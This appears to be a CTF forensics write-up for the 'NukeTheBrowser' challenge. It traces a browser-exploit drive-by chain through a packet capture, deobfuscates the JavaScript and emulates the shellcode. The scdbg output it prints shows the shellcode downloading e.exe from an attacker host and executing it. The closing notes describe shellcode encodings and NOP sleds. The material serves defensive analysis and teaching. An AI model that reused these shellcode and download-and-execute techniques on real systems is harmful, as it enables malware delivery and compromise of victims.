
NukeTheBrowser

📅 Published: 2026-04-19 14:00 | 🔄 Last Updated: 2026-05-12 18:42


https://cyberdefenders.org/blueteam-ctf-challenges/nukethebrowser/

Basic triage

Hosts seen in the capture (NetworkMiner Hosts tab, flattened by extraction):

  • 10.0.2.15
  • 10.0.3.15
  • 10.0.4.15 [8fd12edd2dc1462] (Windows)
  • 10.0.5.15
  • 192.168.56.50
  • 192.168.56.51 [shop.honeynet.sg] (Other)
  • 192.168.56.52 (sploitme.com.cn)
  • 64.236.114.1 (honeynet.org)
  • 224.0.0.22

By using the filter http.host=="sploitme.com.cn" and checking the http.referer field, I can deduce the malicious website chain: shop.honeynet[.]sg → sploitme.com[.]cn → rapidshare.com.eyu32[.]ru

Q1 Multiple systems were targeted. Provide the IP address of the highest one.

Navigate to Statistics > Conversations, and then sort by IP address to find the highest one:

10.0.5.15

Q2 What protocol do you think the attack was carried over?

The answer was obvious

HTTP

Q3 What was the URL for the page used to serve malicious executables (don't include URL parameters)?

Navigate to the NetworkMiner Files tab and search for .exe files.

We know that the website that served the malicious executable is: http://sploitme.com.cn/

In Wireshark, use the filter: http.host=="sploitme.com.cn"

http://sploitme.com.cn/fg/load.php

Q4 What is the number of the packet that includes a redirect to the French version of Google and probably is an indicator for geo-based targeting?

Redirect: In the HTTP protocol, server-side redirection is executed by returning a status code of 301 (moved permanently) or 302 (found). Consequently, the response packet will include a Location: <newURL> header field, which instructs the browser to automatically navigate to that new page.

Accordingly, in Wireshark we use the filter: http.location contains "google"

299
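The filter above can be reproduced offline over reassembled HTTP responses. This is an added example, not code from the original write-up: it parses each response's status line and headers (header names compared case-insensitively) and reports 3xx responses whose Location header contains a search string; the responses and packet numbers are constructed samples.

```python
import re

# Added example, not from the original write-up: an offline equivalent of the
# Wireshark filter  http.location contains "google"  for reassembled responses.

# Constructed sample responses tagged with made-up packet numbers.
SAMPLE_RESPONSES = [
    (10, b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>catalog</html>"),
    (20, b"HTTP/1.1 302 Found\r\nLocation: http://www.google.fr/\r\nContent-Length: 0\r\n\r\n"),
    (30, b"HTTP/1.1 301 Moved Permanently\r\nlocation: http://example.test/other\r\n\r\n"),
    (40, b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"),
]

_STATUS_LINE = re.compile(rb"^HTTP/\d\.\d (\d{3}) ")


def parse_response(raw: bytes):
    """Return (status_code, headers) for a raw HTTP response, or None if it is not one."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    m = _STATUS_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            # Header names are case-insensitive, so normalise them to lower case.
            headers[name.strip().lower().decode("ascii", "replace")] = value.strip().decode("latin-1")
    return int(m.group(1)), headers


def find_redirects(responses, needle: str):
    """List (packet_no, status, location) for 3xx responses whose Location contains needle."""
    hits = []
    for pkt_no, raw in responses:
        parsed = parse_response(raw)
        if parsed is None:
            continue
        status, headers = parsed
        location = headers.get("location")
        if 300 <= status < 400 and location and needle.lower() in location.lower():
            hits.append((pkt_no, status, location))
    return hits


if __name__ == "__main__":
    for pkt_no, status, location in find_redirects(SAMPLE_RESPONSES, "google"):
        print(f"packet {pkt_no}: {status} -> {location}")
```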

Q5 What was the CMS used to generate the page 'shop.honeynet.sg/catalog/'? (Three words, space in between)

  • CMS (Content Management System): A platform that allows users to create, edit, and manage website content without needing any programming knowledge.
  • General-purpose CMS (blogs, news, corporate websites): WordPress (powering over 40% of all websites globally), Joomla, and Drupal.
  • E-commerce CMS: Shopify, Magento, WooCommerce, OpenCart, and osCommerce.
  • A zero-day goldmine: These platforms are a goldmine for attackers looking to discover and exploit zero-day vulnerabilities.
  • Reconnaissance technique: Attackers often use the HTTP Host header to probe and enumerate the targe
  • Use the filter http.host=="shop.honeynet.sg" and skim through the packets to find any unusual one.

The server also sets a cookie named OsCsid, another artifact of an osCommerce installation.

I asked AI for the full name.

osCommerce Online Merchant

Q6 What is the number of the packet that indicates that 'show.php' will not try to infect the same host twice?

I use the filter: http.request.uri contains "show.php"

I skimmed through all the packets, and clearly the URI /fg/show.php is malicious as it served obfuscated JavaScript.

Packet no. 366 caught my attention because it is the third request from 10.0.2.15 to 192.168.56.52: GET /fg/show.php?s=3feb5a6b2f

The server returns a 404 error, which is intentional behaviour designed to avoid infecting the same host multiple times.

366

Q7 One of the exploits being served targets a vulnerability in "msdds.dll". Provide the corresponding CVE number.

Searching Google with the DLL file name as the keyword:

CVE-2005-2127

Q8 What is the name of the executable being served via 'http://sploitme.com.cn/fg/load.php?e=8' ?

Extract the JavaScript found in Q6 (there are two blocks)

and run it in an online JavaScript interpreter (change eval into console.log).

There are 4 blocks of obfuscated code like this.

We then use CyberChef:

  • Swap endianness: Windows is little-endian, so the 16-bit %u units are byte-swapped
  • From hex: convert to binary

Here we can see some revealed strings related to load.php?e=8.

Save the output as shellcode.bin and using scdbg to analyze it:

scdbg -f shellcode.bin /findsc

4010d7 WinExec(C:\users\cuong_nguyen\AppData\Local\Temp\e.exe)
4010e0 ExitThread(0)
Tip: the shellcode imports urlmon.dll, the DLL that handles internet connections and file downloads.

Based on the scdbg trace (WinExec(C:\users\...\Temp\e.exe)), the name of the executable is e.exe

Q9 One of the malicious files was first submitted for analysis on VirusTotal at 2010-02-17 11:02:35 and has an MD5 hash ending with '78873f791'. Provide the full MD5 hash.

The easiest way to solve this question is to use NetworkMiner: navigate to the Files tab and search for executable files.

NetworkMiner already calculates the hash for us, which exactly matches the hash in the question.

52312bb96ce72f230f0350e78873f791

Q10 What is the name of the function that hosted the shellcode relevant to 'http://sploitme.com.cn/fg/load.php?e=3'?

From the analysis in Q8, we know that sploitme.com.cn/fg/load[.]php?e=3 relates to the first obfuscated block, which is:

The answer is: aolwinamp

Q11 Deobfuscate the JS at 'shop.honeynet.sg/catalog/' and provide the value of the 'click' parameter in the resulted URL.

Use the same process as Q8

84c090bd86

Q12 Deobfuscate the JS at 'rapidshare.com.eyu32.ru/login.php' and provide the value of the 'click' parameter in the resulted URL.

Same as the previous question

The URL decode function:

3feb5a6b2f

Q13 What was the version of 'mingw-gcc' that compiled the malware?

Use strings to find out whether there are any hard-coded artifacts in the malware:

strings video.exe | grep "gcc"
/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.c

3.4.5

Q14 The shellcode used a native function inside 'urlmon.dll' to download files from the internet to the compromised host. What is the name of the function?

We already figured this out in Q8:

4010ca URLDownloadToFileA(http://sploitme.com.cn/fg/load.php?e=8, C:\users\cuong_nguyen\AppData\Local\Temp\e.exe)

URLDownloadToFile

Key takeaway

Encoding types

  1. The JavaScript Unicode escape sequence format
  • The %u indicator (the telltale sign): This is the most obvious identifier. In programming languages (especially JavaScript and legacy browsers), the % sign acts as an escape character, and u stands for Unicode. It instructs the system: "The next 4 characters represent a Unicode code point."
  • Limited alphabet: If you look closely at the characters following %u, you will notice they exclusively consist of digits from 0-9 and letters from A-F (e.g., C, B, D, E). This is strictly the hexadecimal (base-16) numeral system. You will never see letters like G, H, or Z here.
  • Example: %u9090%u9090 (This translates to standard NOP sleds \x90\x90\x90\x90 packed into 2-byte chunks).
  2. Hex encoding (C/C++ format)
  • Description: Uses the \x prefix instead of %u, followed by exactly 2 hexadecimal characters (representing 1 byte of data). This is the standard way to represent raw shellcode or byte arrays in languages like C, C++, and Python.
  • Example: \x33\xC0\x64\x8B (In x86 assembly, this translates to xor eax, eax; mov eax, fs:[edx]).
  3. URL encoding (percent-encoding)
  • Description: Similar to hex encoding, but uses the % sign followed by 2 hex characters. It is predominantly seen in web address bars, HTTP requests, and cross-site scripting (XSS) payloads to safely transmit special characters over the internet.
  • Example: %3Cscript%3E (This translates to <script>). Or for raw bytes: %33%C0%64%8B.
  4. XOR / custom cipher
  • Description: Appears as a completely random blob of gibberish (high entropy). There is no discernible pattern, and no clear prefix like %u or \x. When you encounter this, it means the payload is encrypted. You must rely on tools like scdbg or manually trace the surrounding JavaScript/assembly code (as we did in the previous question) to extract the decoding "key" and algorithm.
  • Example: Ý}ͱë© (Raw byte garbage that cannot be read or executed until the shellcode's decoder stub XORs it against a static key like 0x99).